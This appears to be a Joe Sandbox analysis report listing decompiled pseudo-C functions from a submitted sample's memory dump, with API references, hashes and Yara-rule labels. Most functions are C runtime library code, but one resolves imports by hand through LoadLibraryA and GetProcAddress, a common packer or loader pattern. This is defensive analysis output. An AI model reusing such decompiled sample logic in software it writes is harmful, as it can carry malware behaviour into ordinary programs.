				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20)))) + 1;
				goto L3;
			}

0x00415b45
0x00415b45
0x00415b4c
0x00415b51
0x00415b56
0x00415b5c
0x00415b86
0x00415b86
0x00415b89
0x00415b92
0x00415b97
0x00415b9a
0x00415baf
0x00415bb6
0x00415bb9
0x00415bbc
0x00415bbf
0x00415bc2
0x00415bc9
0x00415c66
0x00415c66
0x00415c67
0x00415c6a
0x00000000
0x00000000
0x00415bd0
0x00415bd3
0x00415bd8
0x00415bdc
0x00415bdf
0x00415be1
0x00415be3
0x00415be5
0x00415be5
0x00415bed
0x00415bfb
0x00415c05
0x00415c08
0x00415c0a
0x00000000
0x00415c0c
0x00415c0e
0x00415c0f
0x00415c11
0x00415c3d
0x00415c40
0x00415c43
0x00415c86
0x00415c8a
0x00415c8c
0x00415c8c
0x00415c95
0x00415cac
0x00415cac
0x00415cae
0x00000000
0x00000000
0x00415c9c
0x00415c9f
0x00415c9f
0x00415ca4
0x00415ca5
0x00415cab
0x00415cb0
0x00415cb0
0x00415c73
0x00415c7a
0x00415b80
0x00415b85
0x00415b85
0x00415c45
0x00415c49
0x00415c4b
0x00415c4b
0x00415c51
0x00415c59
0x00415c5e
0x00415c5e
0x00415c61
0x00000000
0x00415c61
0x00415c13
0x00415c16
0x00000000
0x00000000
0x00415c18
0x00415c1b
0x00000000
0x00000000
0x00415c1d
0x00415c21
0x00415c24
0x00415c26
0x00415c26
0x00415c30
0x00000000
0x00415c35
0x00415c0a
0x00415c70
0x00000000
0x00415c70
0x00415b9c
0x00415b9f
0x00415ba5
0x00415ba8
0x00000000
0x00000000
0x00000000
0x00415baa
0x00415b8b
0x00000000
0x00415b8b
0x00415b64
0x00415b6c
0x00000000
0x00000000
0x00415b71
0x00415b73
0x00415b7b
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00415B4C
_fgetc.LIBCMT ref: 00415B9F
_fgetc.LIBCMT ref: 00415BC2

Part of subcall function 0040D0BD: std::_Xinvalid_argument.LIBCPMT ref: 0040D0D1

_memcpy_s.LIBCMT ref: 00415C30
_fgetc.LIBCMT ref: 00415C61

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _fgetc$H_prolog3_Xinvalid_argument_memcpy_sstd::_
String ID:
API String ID: 2343611727-0
Opcode ID: 5c796f60e80008fd18182c902208d887b57ffa1ece4669b792fb26643fdcaf91
Instruction ID: 3fb0cf6ad0f9def23f1bac85c1da399247aa4917ede9e66b4ba247c809d7b7fa
Opcode Fuzzy Hash: 5c796f60e80008fd18182c902208d887b57ffa1ece4669b792fb26643fdcaf91
Instruction Fuzzy Hash: AC51A471A04A19EFDB10DFA8C9C19EEB7B4FF49314B50452BE511A7280E738E984CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004045C5 Relevance: 7.6, APIs: 5, Instructions: 102
libraryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004045C5(void* __esi) {
				signed short* _v8;
				struct HINSTANCE__* _v12;
				signed short _v16;
				void* __edi;
				intOrPtr _t34;
				intOrPtr _t36;
				signed short _t37;
				signed short _t38;
				intOrPtr _t40;
				signed short _t42;
				CHAR* _t43;
				_Unknown_base(*)()* _t44;
				signed int _t45;
				signed int _t48;
				signed short _t55;
				signed short _t60;
				void* _t64;
				signed short _t67;
				signed short _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				_t70 = __esi;
				_t34 =  *((intOrPtr*)(__esi + 0xc0));
				_t72 = _t71 - 0xc;
				if(_t34 != 0 &&  *((intOrPtr*)(__esi + 0xc4)) != 0) {
					_t55 =  *((intOrPtr*)(__esi + 0x144)) + _t34;
					while(1) {
						_t36 =  *((intOrPtr*)(_t55 + 0xc));
						if(_t36 == 0) {
							goto L24;
						}
						_t37 = LoadLibraryA( *((intOrPtr*)(_t70 + 0x144)) + _t36);
						_v12 = _t37;
						__eflags = _t37;
						if(_t37 == 0) {
							L26:
							_push(6);
							goto L27;
						} else {
							_t38 =  *(_t70 + 0x154);
							__eflags =  *(_t70 + 0x150) - _t38;
							if( *(_t70 + 0x150) < _t38) {
								_t67 = _v16;
								goto L13;
							} else {
								__eflags = _t38;
								if(_t38 == 0) {
									_t45 = 0x10;
								} else {
									_t45 = _t38 + _t38;
								}
								 *(_t70 + 0x154) = _t45;
								_t67 = E0041FC5B(_t64, _t69, _t70, _t45 << 2);
								_v16 = _t67;
								__eflags = _t67;
								if(_t67 == 0) {
									_push(3);
									goto L27;
								} else {
									_t48 =  *(_t70 + 0x150);
									__eflags = _t48;
									if(_t48 != 0) {
										__eflags = _t48 << 2;
										E0041F8C0(_t67,  *(_t70 + 0x14c), _t48 << 2);
										_t72 = _t72 + 0xc;
									}
									E0041FC21( *(_t70 + 0x14c));
									 *(_t70 + 0x14c) = _t67;
									L13:
									 *((intOrPtr*)(_t67 +  *(_t70 + 0x150) * 4)) = _v12;
									 *(_t70 + 0x150) =  *(_t70 + 0x150) + 1;
									_t40 =  *((intOrPtr*)(_t70 + 0x144));
									_t69 =  *((intOrPtr*)(_t55 + 0x10)) + _t40;
									__eflags =  *(_t55 + 4);
									_v8 = _t69;
									if( *(_t55 + 4) == 0) {
										goto L21;
									} else {
										_t60 =  *_t55;
										__eflags = _t60;
										if(_t60 == 0) {
											_push(8);
											L27:
											_pop(0);
										} else {
											_v8 = _t60 + _t40;
											while(1) {
												L21:
												_t42 =  *_v8;
												__eflags = _t42;
												if(__eflags == 0) {
													break;
												}
												if(__eflags >= 0) {
													_t43 = _t42 +  *((intOrPtr*)(_t70 + 0x144)) + 2;
												} else {
													_t43 = _t42 & 0x0000ffff;
												}
												_t44 = GetProcAddress(_v12, _t43);
												 *_t69 = _t44;
												__eflags = _t44;
												if(_t44 == 0) {
													goto L26;
												} else {
													_v8 =  &(_v8[2]);
													_t69 = _t69 + 4;
													__eflags = _t69;
													continue;
												}
												goto L25;
											}
											_t55 = _t55 + 0x14;
											__eflags = _t55;
											continue;
										}
									}
								}
							}
						}
						goto L25;
					}
					goto L24;
				}
				L25:
				return 0;
			}

0x004045c5
0x004045c8
0x004045ce
0x004045d5
0x004045ee
0x004046e0
0x004046e0
0x004046e5
0x00000000
0x00000000
0x004045fe
0x00404604
0x00404607
0x00404609
0x004046f1
0x004046f1
0x00000000
0x0040460f
0x0040460f
0x00404615
0x0040461b
0x00404676
0x00000000
0x0040461d
0x0040461d
0x0040461f
0x00404627
0x00404621
0x00404621
0x00404621
0x00404628
0x00404637
0x0040463a
0x0040463d
0x0040463f
0x004046f6
0x00000000
0x00404645
0x00404645
0x0040464b
0x0040464d
0x0040464f
0x0040465a
0x0040465f
0x0040465f
0x00404668
0x0040466e
0x00404679
0x00404682
0x00404685
0x0040468b
0x00404694
0x00404696
0x0040469a
0x0040469d
0x00000000
0x0040469f
0x0040469f
0x004046a1
0x004046a3
0x004046fa
0x004046f3
0x004046f3
0x004046a5
0x004046a7
0x004046d4
0x004046d4
0x004046d7
0x004046d9
0x004046db
0x00000000
0x00000000
0x004046ac
0x004046b9
0x004046ae
0x004046ae
0x004046ae
0x004046c1
0x004046c7
0x004046c9
0x004046cb
0x00000000
0x004046cd
0x004046cd
0x004046d1
0x004046d1
0x00000000
0x004046d1
0x00000000
0x004046cb
0x004046dd
0x004046dd
0x00000000
0x004046dd
0x004046a3
0x0040469d
0x0040463f
0x0040461b
0x00000000
0x00404609
0x00000000
0x004046e0
0x004046ed
0x004046f0

APIs

LoadLibraryA.KERNEL32(?), ref: 004045FE
_malloc.LIBCMT ref: 00404632
_memmove.LIBCMT ref: 0040465A
_free.LIBCMT ref: 00404668

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad_free_malloc_memmove
String ID:
API String ID: 2732542392-0
Opcode ID: 4571b2d31f98c624047a15cf7b9e85daac03a8ab77bc6ae77fba69fee34f2a6d
Instruction ID: 8c833a2999e5a8b0b2036c78d7ebdc524db5b4a1959ec07e35a121a5714d53ce
Opcode Fuzzy Hash: 4571b2d31f98c624047a15cf7b9e85daac03a8ab77bc6ae77fba69fee34f2a6d
Instruction Fuzzy Hash: E63193B1600701EBDB20CF65C840BABB7E4AB85344F14483ADA5AE7380F73EE941DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042D24C Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0042D24C(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x445fe4, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x44664c - _t7;
								if(__eflags == 0) {
									_t9 = E00424F30(__eflags);
									 *_t9 = E00424EEE(GetLastError());
									goto L17;
								} else {
									__eflags = E00426598(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00424F30(__eflags);
										 *_t12 = E00424EEE(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00426598(_t6, _t30);
						 *((intOrPtr*)(E00424F30(__eflags))) = 0xc;
						goto L12;
					} else {
						E0041FC21(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0041FC5B(__edx, __edi, __esi, _a8);
				}
			}

0x0042d255
0x0042d262
0x0042d263
0x0042d266
0x0042d268
0x0042d277
0x0042d2aa
0x0042d2aa
0x0042d2ad
0x00000000
0x00000000
0x0042d27a
0x0042d27c
0x0042d27e
0x0042d27e
0x0042d27e
0x0042d28b
0x0042d291
0x0042d293
0x0042d295
0x0042d2f5
0x0042d2f5
0x0042d297
0x0042d297
0x0042d29d
0x0042d2df
0x0042d2f3
0x00000000
0x0042d29f
0x0042d2a6
0x0042d2a8
0x0042d2c7
0x0042d2db
0x0042d2c1
0x0042d2c1
0x0042d2c1
0x00000000
0x00000000
0x00000000
0x0042d2a8
0x0042d29d
0x00000000
0x0042d2c3
0x0042d2b0
0x0042d2bb
0x00000000
0x0042d26a
0x0042d26d
0x0042d273
0x0042d273
0x0042d2c4
0x0042d2c6
0x0042d257
0x0042d261
0x0042d261

APIs

_malloc.LIBCMT ref: 0042D25A

Part of subcall function 0041FC5B: __FF_MSGBANNER.LIBCMT ref: 0041FC74
Part of subcall function 0041FC5B: __NMSG_WRITE.LIBCMT ref: 0041FC7B
Part of subcall function 0041FC5B: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,000003E8,00000400,?,00420486,0040B965,?,?,0040B965,00000400,?,00000000,000003E8), ref: 0041FCA0

_free.LIBCMT ref: 0042D26D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 9e565af9e247b4276583dece0c675b9b839dd4282166ed08fc786f606938bf98
Instruction ID: 7f95e89877e2b79e36cf0c236710d44af5f493741c7cfc44cd4477c078dfd72a
Opcode Fuzzy Hash: 9e565af9e247b4276583dece0c675b9b839dd4282166ed08fc786f606938bf98
Instruction Fuzzy Hash: AB11E232F05634EBDB212B75BC0565B3B54EF84374BA2046BF8489B294DA3CCC418AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004097E0 Relevance: 7.5, APIs: 5, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004097E0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, void* __eflags) {
				signed int _v8;
				char _v1012;
				char _v2012;
				void* __esi;
				signed int _t10;
				intOrPtr _t31;
				signed int _t34;

				_t31 = __edx;
				_t10 =  *0x444664; // 0xfa3a0753
				_v8 = _t10 ^ _t34;
				E0041F6B0( &_v1012, 0, 0x3e8);
				E0041F6B0( &_v2012, 0, 0x3e8);
				 *0x4474e0( &_v2012,  *0x446d7c);
				 *0x4474e0( &_v1012, E004181BE(__ebx, __edi, 0x3e8, 0x1a));
				 *0x4474e0( &_v2012);
				return E0041F69E(E00409445( &_v1012, _t31), __ebx, _v8 ^ _t34, _t31, __edi, 0x3e8,  &_v1012);
			}

0x004097e0
0x004097e9
0x004097f0
0x00409803
0x00409815
0x0040982a
0x00409840
0x00409854
0x00409871

APIs

_memset.LIBCMT ref: 00409803
_memset.LIBCMT ref: 00409815
lstrcat.KERNEL32(?), ref: 0040982A

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

lstrcat.KERNEL32(?,00000000), ref: 00409840
lstrcat.KERNEL32(?,?), ref: 00409854

Part of subcall function 00409445: _memset.LIBCMT ref: 00409477
Part of subcall function 00409445: _memset.LIBCMT ref: 00409488
Part of subcall function 00409445: _memset.LIBCMT ref: 00409499
Part of subcall function 00409445: _memset.LIBCMT ref: 004094AA
Part of subcall function 00409445: _memset.LIBCMT ref: 004094BB
Part of subcall function 00409445: _memset.LIBCMT ref: 004094CC
Part of subcall function 00409445: _memset.LIBCMT ref: 004094DD
Part of subcall function 00409445: _memset.LIBCMT ref: 004094EE
Part of subcall function 00409445: _memset.LIBCMT ref: 004094FF
Part of subcall function 00409445: lstrcat.KERNEL32(?), ref: 00409514
Part of subcall function 00409445: lstrcat.KERNEL32(?), ref: 00409527
Part of subcall function 00409445: lstrcat.KERNEL32(?), ref: 0040953A
Part of subcall function 00409445: lstrcat.KERNEL32(?), ref: 0040954D
Part of subcall function 00409445: lstrcat.KERNEL32(?), ref: 00409560
Part of subcall function 00409445: lstrcat.KERNEL32(?), ref: 0040956E
Part of subcall function 00409445: lstrcat.KERNEL32(?,0043D134), ref: 00409581

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset$lstrcat$FolderPath
String ID:
API String ID: 154973558-0
Opcode ID: d37250f325ca89b8cba1661d2a01414319fde7bec930a325ea72d9178dbe823f
Instruction ID: c02dce29ff6f0607d8d66986477f795bf994772e1caa7ec0e0a592597036fc81
Opcode Fuzzy Hash: d37250f325ca89b8cba1661d2a01414319fde7bec930a325ea72d9178dbe823f
Instruction Fuzzy Hash: FB015272D00119ABDB11AF64DC45FEA77BCEF05308F0000BAB509A2051EE386B468F99

Uniqueness

Uniqueness Score: -1.00%

Function 00427F49 Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00427F49(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x441368);
				E00428900(__ebx, __edi, __esi);
				_t28 = E00428172(__ebx, __edx, _t31);
				_t12 =  *0x444b98; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00428F70(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00427EFC(_t29,  *0x444de0);
					 *(_t30 - 4) = 0xfffffffe;
					E00427FB6();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00428172(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E0042635D(_t25, _t34);
				}
				return E00428945(_t29);
			}

0x00427f49
0x00427f49
0x00427f49
0x00427f49
0x00427f49
0x00427f4b
0x00427f50
0x00427f5a
0x00427f5c
0x00427f64
0x00427f88
0x00427f8a
0x00427f90
0x00427f9a
0x00427fa5
0x00427fa8
0x00427faf
0x00427f66
0x00427f66
0x00427f6a
0x00000000
0x00427f6c
0x00427f71
0x00427f71
0x00427f6a
0x00427f74
0x00427f76
0x00427f78
0x00427f7a
0x00427f7f
0x00427f87

APIs

__getptd.LIBCMT ref: 00427F55

Part of subcall function 00428172: __getptd_noexit.LIBCMT ref: 00428175
Part of subcall function 00428172: __amsg_exit.LIBCMT ref: 00428182

__getptd.LIBCMT ref: 00427F6C
__amsg_exit.LIBCMT ref: 00427F7A
__lock.LIBCMT ref: 00427F8A
__updatetlocinfoEx_nolock.LIBCMT ref: 00427F9E

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ea1bb2f078ac4190af987b23aba343d0247e3f3fc675c7d4ecc136400f0a8d9b
Instruction ID: 927717a8ff013933939184c0c5e60129b232c8829e773bc74302a40d76f32a77
Opcode Fuzzy Hash: ea1bb2f078ac4190af987b23aba343d0247e3f3fc675c7d4ecc136400f0a8d9b
Instruction Fuzzy Hash: EAF09632B0D7309AE721BBA97D03B5E33906F01724F92028FF444566E2CF6C59418A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004199B9 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 384
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004199B9(void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t231;
				signed int _t232;
				intOrPtr _t238;
				signed int _t244;
				char* _t245;
				void* _t249;
				signed int _t251;
				void* _t253;
				void* _t254;
				intOrPtr* _t257;
				intOrPtr* _t258;
				intOrPtr* _t270;
				intOrPtr* _t271;
				signed int _t276;
				intOrPtr* _t281;
				intOrPtr* _t282;
				char _t285;
				intOrPtr* _t288;
				intOrPtr* _t290;
				char* _t298;
				intOrPtr _t304;
				signed int _t306;
				intOrPtr _t307;
				signed int _t309;
				char* _t311;
				signed int _t316;
				void* _t317;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr _t330;
				intOrPtr _t333;
				char* _t341;
				intOrPtr _t361;
				void* _t372;
				signed int _t375;
				void* _t380;
				void* _t381;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t391;
				void* _t406;

				_t391 = __eflags;
				_t357 = __edx;
				E00423679(E004334FB, __ebx, __edi, __esi);
				 *((char*)(_t380 - 0x80)) =  *((intOrPtr*)(_t380 + 0xc));
				 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 + 0x10));
				 *(_t380 - 0x60) =  *(_t380 + 0x14);
				 *(_t380 - 0x74) =  *(_t380 + 0x18);
				 *(_t380 - 0x58) =  *(_t380 + 0x1c);
				_t361 = __ecx;
				 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 + 0x20));
				 *((intOrPtr*)(_t380 - 0x7c)) = __ecx;
				_t231 = E0040F564(__ecx, _t380 - 0x84);
				_t316 = 0;
				 *(_t380 - 4) = 0;
				_t232 = E0041A353(0, _t361, _t380 - 0x84, _t391);
				 *(_t380 - 4) =  *(_t380 - 4) | 0xffffffff;
				_t375 = _t232;
				 *(_t380 - 0x6c) = _t375;
				E0040F2EA(_t380 - 0x84);
				E0041A2A0(_t375, _t380 - 0x48);
				 *(_t380 - 4) = 1;
				_t329 = _t375;
				 *((char*)(_t380 - 0x8c)) =  *((intOrPtr*)( *_t375 + 8))(_t231, 0x80);
				 *((intOrPtr*)(_t380 - 0x18)) = 0xf;
				 *((intOrPtr*)(_t380 - 0x1c)) = 0;
				 *((char*)(_t380 - 0x2c)) = 0;
				_t376 =  *((intOrPtr*)(_t380 - 0x4c));
				 *(_t380 - 4) = 2;
				_t238 =  *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c))));
				if(_t238 == 0x2b) {
					L2:
					 *(_t380 - 0x78) = 1;
					L3:
					 *((char*)(_t380 - 0x5c)) =  *((intOrPtr*)( *((intOrPtr*)(E00422F73(_t361, _t376, _t393)))));
					 *((short*)(_t380 - 0x5b)) = 0x65;
					 *(_t380 - 0x54) = E00421E20(_t376, 0x65,  *((intOrPtr*)(_t380 - 0x50)));
					_t244 = E00421E20(_t376,  *((char*)(_t380 - 0x5c)),  *((intOrPtr*)(_t380 - 0x50)));
					_t383 = _t381 + 0x18;
					 *(_t380 - 0x64) = _t244;
					if(_t244 == _t316) {
						 *(_t380 - 0x58) = _t316;
					}
					_t245 =  *((intOrPtr*)(_t380 - 0x48));
					if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
						_t245 = _t380 - 0x48;
					}
					if( *_t245 == 0x7f) {
						L32:
						_t330 =  *((intOrPtr*)(_t361 + 0x20));
						_t249 =  *((intOrPtr*)(_t380 - 0x50)) +  *(_t380 - 0x58) +  *(_t380 - 0x74) +  *(_t380 - 0x60);
						_t406 =  *((intOrPtr*)(_t361 + 0x24)) - _t316;
						if(_t406 < 0 || _t406 <= 0 && _t330 <= _t316 || _t330 <= _t249) {
							 *(_t380 - 0x54) = _t316;
						} else {
							 *(_t380 - 0x54) = _t330 - _t249;
						}
						_t251 =  *(_t361 + 0x14) & 0x000001c0;
						if(_t251 != 0x40) {
							if(_t251 == 0x100 &&  *(_t380 - 0x78) > _t316) {
								 *((intOrPtr*)(_t380 - 0x68)) =  *((intOrPtr*)(_t380 + 0x24));
								 *(_t380 - 0x64) =  *(_t380 + 0x28);
								_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c))));
								_t376 = _t380 - 0x68;
								E0041A258( *((intOrPtr*)( *((intOrPtr*)(_t380 - 0x4c)))), _t380 - 0x68);
								 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + 1;
								 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - 1;
								 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x68));
								 *(_t380 + 0x28) =  *(_t380 - 0x64);
							}
							_t290 = E0041A0A5(_t380 - 0x68,  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28),  *((intOrPtr*)(_t380 - 0x80)),  *(_t380 - 0x54));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t290;
							 *(_t380 - 0x54) = _t316;
							 *(_t380 + 0x28) =  *(_t290 + 4);
							_t383 = _t383 + 0x10;
						}
						_t253 = E00421E20( *((intOrPtr*)(_t380 - 0x4c)),  *((char*)(_t380 - 0x5c)),  *((intOrPtr*)(_t380 - 0x50)));
						_t384 = _t383 + 0xc;
						if(_t253 != _t316) {
							_t317 = _t253 -  *((intOrPtr*)(_t380 - 0x4c)) + 1;
							_t281 = E0041A1D0( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x68, _t317 - 1,  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t281;
							 *(_t380 + 0x28) =  *(_t281 + 4);
							_t282 = E0041A0A5(_t380 - 0x68,  *_t281,  *(_t281 + 4), 0x30,  *(_t380 - 0x60));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t282;
							 *(_t380 + 0x28) =  *(_t282 + 4);
							_t285 =  *((intOrPtr*)( *( *(_t380 - 0x6c)) + 4))();
							 *((intOrPtr*)(_t380 - 0x70)) =  *((intOrPtr*)(_t380 + 0x24));
							_t357 = _t285;
							_t376 = _t380 - 0x70;
							 *(_t380 - 0x6c) =  *(_t380 + 0x28);
							E0041A258(_t285, _t380 - 0x70);
							 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x70));
							 *(_t380 + 0x28) =  *(_t380 - 0x6c);
							_t288 = E0041A0A5(_t380 - 0x70,  *((intOrPtr*)(_t380 - 0x70)),  *(_t380 - 0x6c), 0x30,  *(_t380 - 0x74));
							 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + _t317;
							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - _t317;
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t288;
							_t384 = _t384 + 0x34;
							 *(_t380 + 0x28) =  *(_t288 + 4);
							_t316 = 0;
						}
						_t254 = E00421E20( *((intOrPtr*)(_t380 - 0x4c)), 0x65,  *((intOrPtr*)(_t380 - 0x50)));
						_t385 = _t384 + 0xc;
						if(_t254 != _t316) {
							 *(_t380 - 0x6c) = _t254 -  *((intOrPtr*)(_t380 - 0x4c)) + 1;
							_t270 = E0041A1D0( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x88, _t254 -  *((intOrPtr*)(_t380 - 0x4c)) + 1 - 1,  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t270;
							 *(_t380 + 0x28) =  *(_t270 + 4);
							_t271 = E0041A0A5(_t380 - 0x68,  *_t270,  *(_t270 + 4), 0x30,  *(_t380 - 0x58));
							 *((intOrPtr*)(_t380 + 0x24)) =  *_t271;
							 *(_t380 + 0x28) =  *(_t271 + 4);
							_t385 = _t385 + 0x24;
							 *(_t380 - 0x58) = _t316;
							_t341 = "E";
							if(( *( *((intOrPtr*)(_t380 - 0x7c)) + 0x14) & 0x00000004) == 0) {
								_t341 = "e";
							}
							 *((intOrPtr*)(_t380 - 0x88)) =  *_t271;
							_t357 =  *_t341;
							_t376 = _t380 - 0x88;
							 *(_t380 - 0x84) =  *(_t271 + 4);
							E0041A258( *_t341, _t380 - 0x88);
							 *((intOrPtr*)(_t380 + 0x24)) =  *((intOrPtr*)(_t380 - 0x88));
							 *(_t380 + 0x28) =  *(_t380 - 0x84);
							_t276 =  *(_t380 - 0x6c);
							 *((intOrPtr*)(_t380 - 0x4c)) =  *((intOrPtr*)(_t380 - 0x4c)) + _t276;
							 *((intOrPtr*)(_t380 - 0x50)) =  *((intOrPtr*)(_t380 - 0x50)) - _t276;
						}
						_t257 = E0041A1D0( *((intOrPtr*)(_t380 - 0x4c)), _t357, _t380 - 0x70,  *((intOrPtr*)(_t380 - 0x50)),  *((intOrPtr*)(_t380 - 0x8c)),  *((intOrPtr*)(_t380 + 0x24)),  *(_t380 + 0x28));
						 *((intOrPtr*)(_t380 + 0x24)) =  *_t257;
						 *(_t380 + 0x28) =  *(_t257 + 4);
						_t258 = E0041A0A5(_t380 - 0x68,  *_t257,  *(_t257 + 4), 0x30,  *(_t380 - 0x58));
						_t333 =  *((intOrPtr*)(_t380 - 0x7c));
						 *((intOrPtr*)(_t380 + 0x24)) =  *_t258;
						 *(_t380 + 0x28) =  *(_t258 + 4);
						 *(_t333 + 0x20) = _t316;
						 *(_t333 + 0x24) = _t316;
						E0041A0A5( *((intOrPtr*)(_t380 + 8)),  *_t258,  *(_t258 + 4),  *((intOrPtr*)(_t380 - 0x80)),  *(_t380 - 0x54));
						E00404A66(_t380 - 0x2c, 1, _t316);
						E00404A66(_t380 - 0x48, 1, _t316);
						return E004236C3(_t316,  *((intOrPtr*)(_t380 + 8)), _t376);
					} else {
						_t298 =  *((intOrPtr*)(_t380 - 0x48));
						if( *((intOrPtr*)(_t380 - 0x34)) < 0x10) {
							_t298 = _t380 - 0x48;
						}
						_t398 =  *_t298;
						if( *_t298 > 0) {
							E0040CFD5(_t380 - 0x2c,  *((intOrPtr*)(_t380 - 0x50)), _t398, _t376);
							if( *(_t380 - 0x54) != 0) {
								__eflags =  *(_t380 - 0x64);
								if( *(_t380 - 0x64) == 0) {
									E0040D0BD( *(_t380 - 0x60), _t329, _t380 - 0x2c, 0x30);
									_t53 = _t380 - 0x60;
									 *_t53 =  *(_t380 - 0x60) & 0x00000000;
									__eflags =  *_t53;
								}
